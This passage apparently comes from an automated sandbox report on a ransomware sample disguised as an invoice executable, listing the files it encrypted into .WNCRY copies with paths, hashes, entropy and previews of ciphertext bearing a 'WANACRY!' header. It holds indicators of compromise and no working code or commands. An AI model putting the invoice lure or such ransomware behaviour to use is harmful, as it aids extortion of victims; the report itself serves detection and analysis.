                                                          Preview:WANACRY!....eU|\..y*..\N./>-I.......4.....?(.....4.K....W]..ZA]9P_.W..6}.....B.x.iP,....o.D7....*,.|..2`.N.$......7V..L*..h..u...k...q:CI..Y....6.*.t.4j$.7.p.....I>..`......&I.E.j..%.X.5a...L./{....J_..e..Z/...L..W.j_SO.w..%.+.~..`)NW.m...t....f.|..q...............L....%.D....h...Tr.Wu....j.*!..........&.c..mo>.[^.kTO.^ .......^....4+.|P.R..x...!z......b..zM....u?.........6.R...7.z.8.N..+{|{~.8....t..t.j.Hm....pj..nIPQ....7...%.......Q.Z..\H).=A...-1...<..^N...-.p..I.C...X8...*..P;..X....%......$>.%3.....t...=m..F.7B....X:`..H-.H<..g.w......d..RG..Q...._.&.r..J.0... ...`.........#..-.s..5......|2.........d.E...%.x.....K ],...]..Z$.."............]I:..JN.\...p..`.....0.....4.$.Kd...Aj7g.<).~%!(4$.....93.tY"Z..U`.W...-....B.....j.....Fs......i.6..r...w........d.J...W=.=......F1.....ILe!T...*T.xc..e0..s......F~]2.Gp>..|.c7g...<vzv`..D..i...}....R~S.....r./..&tE.`..nYDv.g.s....,.......p.~Wp`..O..J........>4?....Sr..s..;!{.w.V......0..t....e.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410568410610122.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):101816
                                                          Entropy (8bit):7.998414227061809
                                                          Encrypted:true
                                                          SSDEEP:1536:0qSUdSM9lTGklTktNjVJNn/MK0xCeLYfLK5AFkiXATLsyIbh8a86+GjHok0CIGMw:0kdSM9lXTIXd/MD88YjyQKfSbSG7571
                                                          MD5:D507FE8C2A8E8343CAA7C3F4B379B0EF
                                                          SHA1:742E895E2185AD54B571750E739EFBFA3005DB33
                                                          SHA-256:1D5D0BB2AFE8232867492C3F4054920FA0DFD6148C82C53D8E05763706C28668
                                                          SHA-512:4500B0CD98B88EDEF9DA957E4AF72D1BAC0D83189B0DB21981FC20A0970F14D681B13D546FBC4E192542A3DFB39E281C0FF2B48AFEC4A8889EA529886A3EF4A1
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....eU|\..y*..\N./>-I.......4.....?(.....4.K....W]..ZA]9P_.W..6}.....B.x.iP,....o.D7....*,.|..2`.N.$......7V..L*..h..u...k...q:CI..Y....6.*.t.4j$.7.p.....I>..`......&I.E.j..%.X.5a...L./{....J_..e..Z/...L..W.j_SO.w..%.+.~..`)NW.m...t....f.|..q...............L....%.D....h...Tr.Wu....j.*!..........&.c..mo>.[^.kTO.^ .......^....4+.|P.R..x...!z......b..zM....u?.........6.R...7.z.8.N..+{|{~.8....t..t.j.Hm....pj..nIPQ....7...%.......Q.Z..\H).=A...-1...<..^N...-.p..I.C...X8...*..P;..X....%......$>.%3.....t...=m..F.7B....X:`..H-.H<..g.w......d..RG..Q...._.&.r..J.0... ...`.........#..-.s..5......|2.........d.E...%.x.....K ],...]..Z$.."............]I:..JN.\...p..`.....0.....4.$.Kd...Aj7g.<).~%!(4$.....93.tY"Z..U`.W...-....B.....j.....Fs......i.6..r...w........d.J...W=.=......F1.....ILe!T...*T.xc..e0..s......F~]2.Gp>..|.c7g...<vzv`..D..i...}....R~S.....r./..&tE.`..nYDv.g.s....,.......p.~Wp`..O..J........>4?....Sr..s..;!{.w.V......0..t....e.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410568649888396.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):104072
                                                          Entropy (8bit):7.998454795859105
                                                          Encrypted:true
                                                          SSDEEP:3072:s7gdeLvKQoHKH/8ij8qOte60eIHxMtNe/i:4lvKrQ8cKceIHWtNqi
                                                          MD5:97FBF69CB2ED7F4A0C26970903952D81
                                                          SHA1:5F095FBFC48BF4429C4B508271B6D7C171C502CE
                                                          SHA-256:EAD3365A9A77B2A5BC9C1349D6BDFD20FF7BC8D2F847C0F97ED7861D0CD2ED9A
                                                          SHA-512:8D7D8D5270297D168D64CD30D18E01F988ED412D9AC58CF9A2D385F01BD1EC144FCDB7CD21B7B8A32FE456D9803FD766EE6AAD5E49E179071A8634D044E4B360
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....T......7j._\W..O..x..i...|..utb.......8~...J...Yy./...x....r.H2....P..uF.7Fv...x.A.i.....{.C+T..1...c.O&........"...lHc......"...{.....yM.qW$....\.>V..../[.S......2..=..k...8....l.}..O.8......Oiu.Z...l.7...+....e.....2[.|.<.7...v.....-........h.......aagk..s..o..lT}../B.... ..i....r.S..w..s.'...+g\#.s......$g..hk.. .3...63....WPr. .3\^..%o.]..-..r.".i.......A..]U.Lf.......l......(..O~.q.p`).`...<f.w.`.;\-...XC..&p0.V..gl....B.iJ......!.....&.X.....;.t..J6.H...A..2..z.P8...B...7.......F{3.7.....US.L..{,3..z@...z]....//...RV.\..Eb.v}.(..o.a....2...D.>..6.T..B....\.w.......vS.....^3b'.O..H..&q.....U...(.}qs..1v..+......G#..k.p..`.UQ..r...npE.J..d.?..T!..Q.S.n..ez.f...?m...[..g.XQ!..w..up.........5m.b.ah{..|?,p`.X_.W..uO....$.Wh.FK.v....~......PJ....^..-......(.~.F..V..Z.....o...O.RS..~.<Zn.U.;.2.....^mj..E>.,jT..........w.V......1............]..,...>-..B....6@U...N..4y.......Rg.m...lB._{N]..E..>....hS.T/{...n....Np...J.....R7

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410568649888396.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):104072
                                                          Entropy (8bit):7.998454795859105
                                                          Encrypted:true
                                                          SSDEEP:3072:s7gdeLvKQoHKH/8ij8qOte60eIHxMtNe/i:4lvKrQ8cKceIHWtNqi
                                                          MD5:97FBF69CB2ED7F4A0C26970903952D81
                                                          SHA1:5F095FBFC48BF4429C4B508271B6D7C171C502CE
                                                          SHA-256:EAD3365A9A77B2A5BC9C1349D6BDFD20FF7BC8D2F847C0F97ED7861D0CD2ED9A
                                                          SHA-512:8D7D8D5270297D168D64CD30D18E01F988ED412D9AC58CF9A2D385F01BD1EC144FCDB7CD21B7B8A32FE456D9803FD766EE6AAD5E49E179071A8634D044E4B360
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....T......7j._\W..O..x..i...|..utb.......8~...J...Yy./...x....r.H2....P..uF.7Fv...x.A.i.....{.C+T..1...c.O&........"...lHc......"...{.....yM.qW$....\.>V..../[.S......2..=..k...8....l.}..O.8......Oiu.Z...l.7...+....e.....2[.|.<.7...v.....-........h.......aagk..s..o..lT}../B.... ..i....r.S..w..s.'...+g\#.s......$g..hk.. .3...63....WPr. .3\^..%o.]..-..r.".i.......A..]U.Lf.......l......(..O~.q.p`).`...<f.w.`.;\-...XC..&p0.V..gl....B.iJ......!.....&.X.....;.t..J6.H...A..2..z.P8...B...7.......F{3.7.....US.L..{,3..z@...z]....//...RV.\..Eb.v}.(..o.a....2...D.>..6.T..B....\.w.......vS.....^3b'.O..H..&q.....U...(.}qs..1v..+......G#..k.p..`.UQ..r...npE.J..d.?..T!..Q.S.n..ez.f...?m...[..g.XQ!..w..up.........5m.b.ah{..|?,p`.X_.W..uO....$.Wh.FK.v....~......PJ....^..-......(.~.F..V..Z.....o...O.RS..~.<Zn.U.;.2.....^mj..E>.,jT..........w.V......1............]..,...>-..B....6@U...N..4y.......Rg.m...lB._{N]..E..>....hS.T/{...n....Np...J.....R7

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410568689900585.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):104072
                                                          Entropy (8bit):7.998255098876641
                                                          Encrypted:true
                                                          SSDEEP:1536:hcojy3lQOSxDAEQv9VYaK8xld1sRxATDIPwbh8assa0x6smNvvPIccs80071H:h8IxE/rZUR6brfx6sm920071H
                                                          MD5:B2AC304FA33BEF498375F6F52978324D
                                                          SHA1:231DD1D20EFB33787417F6235FC7F3EBE5F70995
                                                          SHA-256:23199A22798B88608CAAF219EB153F5C858A7D31324E5BEA23F55A734A7D9DAF
                                                          SHA-512:EDEB8AD41D474742ADFC529BAC8B2156B330919C355279396660A8A303ADB81F880593F558D60CB9F4590329EB43D8E88910A9C7F8FFAD12CA607DD3489FBC33
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....e......U..I..M.N.B....F."..;..(...(.s.....z..X....}...&.K...u.z....;...0T...._w.by/...})./d=.)"..g..-.........D..2zN_0.^4";...<.....M..}..yd~...2D....3.-..R...Ue?...../(...!e..#lN..8..20..)Mz..j..E.vpEiP..Q.1....w.e&.U.a...~.&4n..[.UM...d.?..P._....h.......{.)...-t....@B|G...\k.e..C..=.>.}.....bn..~..V5.f=W.a...no=.{..Bu.qd.^.,.9..p.......x.h.....4...#:...k.....+o.IG..v5IS... ..|.|.A._.&...N.P......6.........@...H.. ^D..)...*J.<j.^.U....UYK../.8.1_..m..^._.ZR~w..T..Uw..H.....VA...E...v.;.....L.._..^..s'E..M..c...1.<C.PD..H,OT.....N.2L...k.....2.$..STd.`.Y.j.j0.;..D....L.A.h..\..`....l...8......k.<.`2..Fc.8Kc........!.^......._~v...nh`i gz...T Yx...Nn.P._....0...&b..,).MB..._d]........................`..:.9O.A.....N.9..`P......*Gy.....i.x.~..|..s}../YM.G$;x..o{r..w`..9Z.KF]...).V.P'..d...7 .7.p.....g.....gL.16I..D`..#6....o..p.......L.,zmS......n9..'o..o-X.X....@9.|.....k.a..w.....S..(...-U.-!31Q...d.G......8...:.B'>.C .....E..K..u..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410568689900585.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):104072
                                                          Entropy (8bit):7.998255098876641
                                                          Encrypted:true
                                                          SSDEEP:1536:hcojy3lQOSxDAEQv9VYaK8xld1sRxATDIPwbh8assa0x6smNvvPIccs80071H:h8IxE/rZUR6brfx6sm920071H
                                                          MD5:B2AC304FA33BEF498375F6F52978324D
                                                          SHA1:231DD1D20EFB33787417F6235FC7F3EBE5F70995
                                                          SHA-256:23199A22798B88608CAAF219EB153F5C858A7D31324E5BEA23F55A734A7D9DAF
                                                          SHA-512:EDEB8AD41D474742ADFC529BAC8B2156B330919C355279396660A8A303ADB81F880593F558D60CB9F4590329EB43D8E88910A9C7F8FFAD12CA607DD3489FBC33
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....e......U..I..M.N.B....F."..;..(...(.s.....z..X....}...&.K...u.z....;...0T...._w.by/...})./d=.)"..g..-.........D..2zN_0.^4";...<.....M..}..yd~...2D....3.-..R...Ue?...../(...!e..#lN..8..20..)Mz..j..E.vpEiP..Q.1....w.e&.U.a...~.&4n..[.UM...d.?..P._....h.......{.)...-t....@B|G...\k.e..C..=.>.}.....bn..~..V5.f=W.a...no=.{..Bu.qd.^.,.9..p.......x.h.....4...#:...k.....+o.IG..v5IS... ..|.|.A._.&...N.P......6.........@...H.. ^D..)...*J.<j.^.U....UYK../.8.1_..m..^._.ZR~w..T..Uw..H.....VA...E...v.;.....L.._..^..s'E..M..c...1.<C.PD..H,OT.....N.2L...k.....2.$..STd.`.Y.j.j0.;..D....L.A.h..\..`....l...8......k.<.`2..Fc.8Kc........!.^......._~v...nh`i gz...T Yx...Nn.P._....0...&b..,).MB..._d]........................`..:.9O.A.....N.9..`P......*Gy.....i.x.~..|..s}../YM.G$;x..o{r..w`..9Z.KF]...).V.P'..d...7 .7.p.....g.....gL.16I..D`..#6....o..p.......L.,zmS......n9..'o..o-X.X....@9.|.....k.a..w.....S..(...-U.-!31Q...d.G......8...:.B'>.C .....E..K..u..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410568968645838.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):105032
                                                          Entropy (8bit):7.998103117954112
                                                          Encrypted:true
                                                          SSDEEP:1536:oCa7TkPWhh8Y/9cYwKcAAgYEnJLVSDuWaW8n7f+99uoXWGwFtmeNC1kMjS3ywDZS:gTGWhhd1cMApEDYv0f+99/kEXxK8HWVM
                                                          MD5:E4D32B6187E151B07771505CC4DDE537
                                                          SHA1:39D5C766D2126C7D54919DB7B8AEC65902F33D61
                                                          SHA-256:AF6AAC48A4DD7947E1C6796EF7014B9C4B67ABBEF4E28D4997F2175F77551B6D
                                                          SHA-512:A2A577E7F6DA746A1542EA3379FC99386C5078DB204A516C30CF7800E2D3942D6FE29A4A6B135ECAB11C92162AAD33E628321437A3B67222086426363B2AE380
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....j..p5.......$..Y]..g-:W..$.!........T6D..N`..b...H[p.(.%=..$n...B.R.p@..!f.OB/eT...&.O...L..%........_.}..Q.@{....J..f.n......!..........O........9....B...v..]T;.0.R9..*...c.....3.....-..b.....4...PN.K.......\.H..v............y.@.9k..............%........q...7.....C...o.g.S..j..q........C.!f...B.5....z....b....8B..d&....r~/_m.....'3..."..L...X.Zn......a.f...R.r.p.$..x?.O..........hCa^t.L.}...W..4......d..Y'......p.y.ui......A5T.6P%......FXsw.l.g.$^G....].&]......'g..;g..(.UOhP.p....Q...^Z..}tb..T...^8v..g..S..`..6....-.$.5e.."......l..)..].I._..dk`{....8{.x*.wN.n.7L....x.....O.;@7._....Z..L...s.............../.`......Se..7...P(..pd.tS.... .f.h...b.t.D....e..m....}jY{..-...'..Y.g...df..w......zD.v4s.z..}=ecT............Y$R......L.@...B.......p..i.pS...>......../`k...LPT..|.f>a9R...`$N_.I.!P.7...b...c.QG...$agY...z..~a.Lxb...yJ....4 .<[e0..\N.&.......p-..s.1...%D.HK......|,.U.....*.f.NO.$..DLz..2..RK-3.*....:M3[../....k...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410568968645838.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):105032
                                                          Entropy (8bit):7.998103117954112
                                                          Encrypted:true
                                                          SSDEEP:1536:oCa7TkPWhh8Y/9cYwKcAAgYEnJLVSDuWaW8n7f+99uoXWGwFtmeNC1kMjS3ywDZS:gTGWhhd1cMApEDYv0f+99/kEXxK8HWVM
                                                          MD5:E4D32B6187E151B07771505CC4DDE537
                                                          SHA1:39D5C766D2126C7D54919DB7B8AEC65902F33D61
                                                          SHA-256:AF6AAC48A4DD7947E1C6796EF7014B9C4B67ABBEF4E28D4997F2175F77551B6D
                                                          SHA-512:A2A577E7F6DA746A1542EA3379FC99386C5078DB204A516C30CF7800E2D3942D6FE29A4A6B135ECAB11C92162AAD33E628321437A3B67222086426363B2AE380
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....j..p5.......$..Y]..g-:W..$.!........T6D..N`..b...H[p.(.%=..$n...B.R.p@..!f.OB/eT...&.O...L..%........_.}..Q.@{....J..f.n......!..........O........9....B...v..]T;.0.R9..*...c.....3.....-..b.....4...PN.K.......\.H..v............y.@.9k..............%........q...7.....C...o.g.S..j..q........C.!f...B.5....z....b....8B..d&....r~/_m.....'3..."..L...X.Zn......a.f...R.r.p.$..x?.O..........hCa^t.L.}...W..4......d..Y'......p.y.ui......A5T.6P%......FXsw.l.g.$^G....].&]......'g..;g..(.UOhP.p....Q...^Z..}tb..T...^8v..g..S..`..6....-.$.5e.."......l..)..].I._..dk`{....8{.x*.wN.n.7L....x.....O.;@7._....Z..L...s.............../.`......Se..7...P(..pd.tS.... .f.h...b.t.D....e..m....}jY{..-...'..Y.g...df..w......zD.v4s.z..}=ecT............Y$R......L.@...B.......p..i.pS...>......../`k...LPT..|.f>a9R...`$N_.I.!P.7...b...c.QG...$agY...z..~a.Lxb...yJ....4 .<[e0..\N.&.......p-..s.1...%D.HK......|,.U.....*.f.NO.$..DLz..2..RK-3.*....:M3[../....k...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410569273535777.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):105064
                                                          Entropy (8bit):7.99831379770481
                                                          Encrypted:true
                                                          SSDEEP:1536:vceMn43nD5A+NUqqDv1xpqp02Tb/5sqjo8Stb0+RY7gw3T+AjlS2idWG+Qk:E83n9A+N4xxBIbItbZRYZBmWGPk
                                                          MD5:B8930EFD8CD1D40C20E63FC2207D6899
                                                          SHA1:4A0178F38E8017770C8EA63209908E5D834B2CDE
                                                          SHA-256:D0817218A840FC2D8F8A34C56972B07081A70310254C0013774D019426005376
                                                          SHA-512:5643743166873F0F231D3C326C33731762AC3210E9B5A3B8C8C4CFAE1172A77420E292911F94C0E1A6F7321CE130993D04035B17D42E07562DA1ADFA04E18475
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....&..Z........}...#.#..B.A.....;............rq Z@.Tl..(..{.|...^)..S.xV}.d.F....yk.....j..m.=.......?1.~.....It...I.........}...D].......t..)...D......8u.u..VC..e...8q,...@'.9...;M.!.`..Is.'+.P.X.......V.AV.Quk...Y#..J.....T...83..]O......!.....I.........,...je...yQd.9......6..;.M..8....7w.h....@......O.6[.,.*.!....`t..2P.#h.K."bV.7.|.k.$.w.....0.{...l..I.H7....U.H....C.ht.V.r.[I)...Ea..6..3......+../.p...1-.%.Y..e]....y../.f.....@|.D.#.m..u..:.Hi...|....=0..g.k..k. R.pk..G.....'=[j..qf..x.D6.8)....p.0../..A..eN+fa...EO...g..h.A.$.<q...h........S..ci..>H.Pj<..(R.H..@:L.qf..`2<.dP...J..B+}Nz............X...>A........b^..j.9.9.).c.%5Q.1.L..tb...tHJ.......w2.bC`.."M.........H+.e..i$..l0......9o5..q.-L0..fS.ox.h.{...YM....Lh...x..1.;.I.).S.U.L..#.'...x...(j..C..+...:P.6f.}..##......V....C.,.......LB{zw\ U.9..[^.6...9....>...?C....`l..gS..6@.Y?....(FU......T.L!..3.....*?e..T..`.E.q)g.z.......c?...x^F..q7......N...-=M...|.s..s&

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410569273535777.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):105064
                                                          Entropy (8bit):7.99831379770481
                                                          Encrypted:true
                                                          SSDEEP:1536:vceMn43nD5A+NUqqDv1xpqp02Tb/5sqjo8Stb0+RY7gw3T+AjlS2idWG+Qk:E83n9A+N4xxBIbItbZRYZBmWGPk
                                                          MD5:B8930EFD8CD1D40C20E63FC2207D6899
                                                          SHA1:4A0178F38E8017770C8EA63209908E5D834B2CDE
                                                          SHA-256:D0817218A840FC2D8F8A34C56972B07081A70310254C0013774D019426005376
                                                          SHA-512:5643743166873F0F231D3C326C33731762AC3210E9B5A3B8C8C4CFAE1172A77420E292911F94C0E1A6F7321CE130993D04035B17D42E07562DA1ADFA04E18475
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....&..Z........}...#.#..B.A.....;............rq Z@.Tl..(..{.|...^)..S.xV}.d.F....yk.....j..m.=.......?1.~.....It...I.........}...D].......t..)...D......8u.u..VC..e...8q,...@'.9...;M.!.`..Is.'+.P.X.......V.AV.Quk...Y#..J.....T...83..]O......!.....I.........,...je...yQd.9......6..;.M..8....7w.h....@......O.6[.,.*.!....`t..2P.#h.K."bV.7.|.k.$.w.....0.{...l..I.H7....U.H....C.ht.V.r.[I)...Ea..6..3......+../.p...1-.%.Y..e]....y../.f.....@|.D.#.m..u..:.Hi...|....=0..g.k..k. R.pk..G.....'=[j..qf..x.D6.8)....p.0../..A..eN+fa...EO...g..h.A.$.<q...h........S..ci..>H.Pj<..(R.H..@:L.qf..`2<.dP...J..B+}Nz............X...>A........b^..j.9.9.).c.%5Q.1.L..tb...tHJ.......w2.bC`.."M.........H+.e..i$..l0......9o5..q.-L0..fS.ox.h.{...YM....Lh...x..1.;.I.).S.U.L..#.'...x...(j..C..+...:P.6f.}..##......V....C.,.......LB{zw\ U.9..[^.6...9....>...?C....`l..gS..6@.Y?....(FU......T.L!..3.....*?e..T..`.E.q)g.z.......c?...x^F..q7......N...-=M...|.s..s&

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410569507933106.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):105064
                                                          Entropy (8bit):7.99807045874544
                                                          Encrypted:true
                                                          SSDEEP:3072:HLnxSwuhYsp5IzlzRSUu9xXSVFwFf03FkZKsvA36p9t:rnVuhYspC2vXSDFkZKOx
                                                          MD5:240D818826BF7AA9859FFC5E70DE7ED9
                                                          SHA1:F51FC47DBCA5A4F27C6BE39F30B18D71877B84FF
                                                          SHA-256:DF1FECD6051D92B63185D828F8639BABADAF3B058AE272231B2256A76BFAE222
                                                          SHA-512:B00496B23D433F0B6E8FBABC598A5D92BD3CE537DEE111065947689BDF8828C11E1061AE18F85CFA84612E73CA1FBC0C3B6424D84F8F204F5B70D047C97EA993
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....-U...".2s....kV...........w&...t.i.u..tFf......H.....dH.......q.a......i#.9....`...ne!.].`a.B. .:.J.b.Q.o...~......;..L...*i.s...q&.1.6.d..O.c.TPy..B}...f.a>........t.iqO1.P.B..M..w*C....?&HF.w....<zA.......a.....Fh...}.j..QH,1....]/.2k!....I.........a.B................y..Q.B.q.........#Z..E..pU.=/...B.+y...oU...=w=hlx.J.a.,...I._..P...8L....p....1@...x.....V.6|...s..(fv(".Z.1..... ..d#..}L....)..U~...W....H....I.c..vN..@...)73h.U.T/..s..o..][.-.=Kf.+....+./!;D..l..i...*..n.".....t..#f.#..Y.;..@[0.h.......X.....@DN....E.2RS.`.W.aq.y...?m.]..%..W%...W...a~.~.........98_H.....@..3a....m..i.C....3..R.}...x<2..c.. ...I..\"..M.....Y..Jr.O2.)co.B.b6...1.!....~...[.+sK......%r).}...W...|L...E8.>.A...[P...cA.r.`.nc..K..h.Z.E.......'....q...g....?k.B.oqJ..F...'..]........".8K.z...ae..:[..k.....~5.n..8e.'.L."....Q'.E...T..e.m..2..+..c\f.=8..<.u.4Ez.wo*..x.......B.U....&7....^....+AC(.X.&-...p0."uG.<....#I.VqeM...;.<w;...B....A..Z..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410569507933106.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):105064
                                                          Entropy (8bit):7.99807045874544
                                                          Encrypted:true
                                                          SSDEEP:3072:HLnxSwuhYsp5IzlzRSUu9xXSVFwFf03FkZKsvA36p9t:rnVuhYspC2vXSDFkZKOx
                                                          MD5:240D818826BF7AA9859FFC5E70DE7ED9
                                                          SHA1:F51FC47DBCA5A4F27C6BE39F30B18D71877B84FF
                                                          SHA-256:DF1FECD6051D92B63185D828F8639BABADAF3B058AE272231B2256A76BFAE222
                                                          SHA-512:B00496B23D433F0B6E8FBABC598A5D92BD3CE537DEE111065947689BDF8828C11E1061AE18F85CFA84612E73CA1FBC0C3B6424D84F8F204F5B70D047C97EA993
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....-U...".2s....kV...........w&...t.i.u..tFf......H.....dH.......q.a......i#.9....`...ne!.].`a.B. .:.J.b.Q.o...~......;..L...*i.s...q&.1.6.d..O.c.TPy..B}...f.a>........t.iqO1.P.B..M..w*C....?&HF.w....<zA.......a.....Fh...}.j..QH,1....]/.2k!....I.........a.B................y..Q.B.q.........#Z..E..pU.=/...B.+y...oU...=w=hlx.J.a.,...I._..P...8L....p....1@...x.....V.6|...s..(fv(".Z.1..... ..d#..}L....)..U~...W....H....I.c..vN..@...)73h.U.T/..s..o..][.-.=Kf.+....+./!;D..l..i...*..n.".....t..#f.#..Y.;..@[0.h.......X.....@DN....E.2RS.`.W.aq.y...?m.]..%..W%...W...a~.~.........98_H.....@..3a....m..i.C....3..R.}...x<2..c.. ...I..\"..M.....Y..Jr.O2.)co.B.b6...1.!....~...[.+sK......%r).}...W...|L...E8.>.A...[P...cA.r.`.nc..K..h.Z.E.......'....q...g....?k.B.oqJ..F...'..]........".8K.z...ae..:[..k.....~5.n..8e.'.L."....Q'.E...T..e.m..2..+..c\f.=8..<.u.4Ez.wo*..x.......B.U....&7....^....+AC(.X.&-...p0."uG.<....#I.VqeM...;.<w;...B....A..Z..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410569637876063.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):105512
                                                          Entropy (8bit):7.998341109819598
                                                          Encrypted:true
                                                          SSDEEP:3072:qwp0SFRU0XJlqjaJpIV6px/U9eH39u+i+Y80:Tp0SvdXnTIV6H8etu+Rj0
                                                          MD5:C4E390A0C31E40A28BE5659E1519EF23
                                                          SHA1:D9D30A457A172B2B4938608516936BA46B7414C3
                                                          SHA-256:6A337210E979B5CE167EA3D2A5F2B21C200449EFE27B269AC3D5A01174519143
                                                          SHA-512:237A4318B0CFE42D6109C70B2E04AEB3D072C9D9D3A219DA8E456324D081C6E1F0CB4E2FEF306638A4C535F7566675C65584845548F605AB46F67F39D2DFD6EF
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....5.....ps.......n..P.n.l..r...=.......e.....2.-.s.8.T.N..... .H#...9......Ia...&.f...v,.zn*b.=......V.J;/E.AjM.j.:...9.%.........v('.......Z"...~)L.4.0....+...l.......i.............2.<d-.\.FyJ/.Nl....i.._I.....B...$..V........."p.G.r...5...\....................s.3.Z...@....w..........o..y......R......:..#y....W..\}..)k-..f.$.L...e.RC......X9.9D..pd..}...>O.k .kb.Qv,...v...s#.)/.S.q.r'...="Hs...N.E.u..Q..YET.&.B.!5.'.....".riD.LBYn*....)G..6....C. .^I..xf.....0Fw.4.I,.@.....?.*q.....h.B.h).M...O.%.#W.rpO..#.......2....v... .G.N...&.=Z..*EvB..AxoO.y..s@..j."Qp.L...G....#.|4.?i...s+...g..'..o._...h...6F..U.n..:..?...K.q._.........#Gr8..j...{qd.s5....y4.|Dl..:.@(..s.;.;'.......r......Xu....W^Xx.........]0.%.@.d../.X.g..9{;.M.=...E.F.s.i- `r#....2.i..@=.U:.b.9G...e..)V..T..ZG-.0d..L....#...uY..*......E....zA.......e1:.cc.....b.h7#.......f{..=..[<.=R.%..#.w*.....;[.....O.R.(VX..6..x.8Sm..xW...%RWr..9-TV0....Q&.$SYKt.h).9........KB.4.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410569637876063.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):105512
                                                          Entropy (8bit):7.998341109819598
                                                          Encrypted:true
                                                          SSDEEP:3072:qwp0SFRU0XJlqjaJpIV6px/U9eH39u+i+Y80:Tp0SvdXnTIV6H8etu+Rj0
                                                          MD5:C4E390A0C31E40A28BE5659E1519EF23
                                                          SHA1:D9D30A457A172B2B4938608516936BA46B7414C3
                                                          SHA-256:6A337210E979B5CE167EA3D2A5F2B21C200449EFE27B269AC3D5A01174519143
                                                          SHA-512:237A4318B0CFE42D6109C70B2E04AEB3D072C9D9D3A219DA8E456324D081C6E1F0CB4E2FEF306638A4C535F7566675C65584845548F605AB46F67F39D2DFD6EF
                                                          Malicious:true
                                                          Reputation:unknown
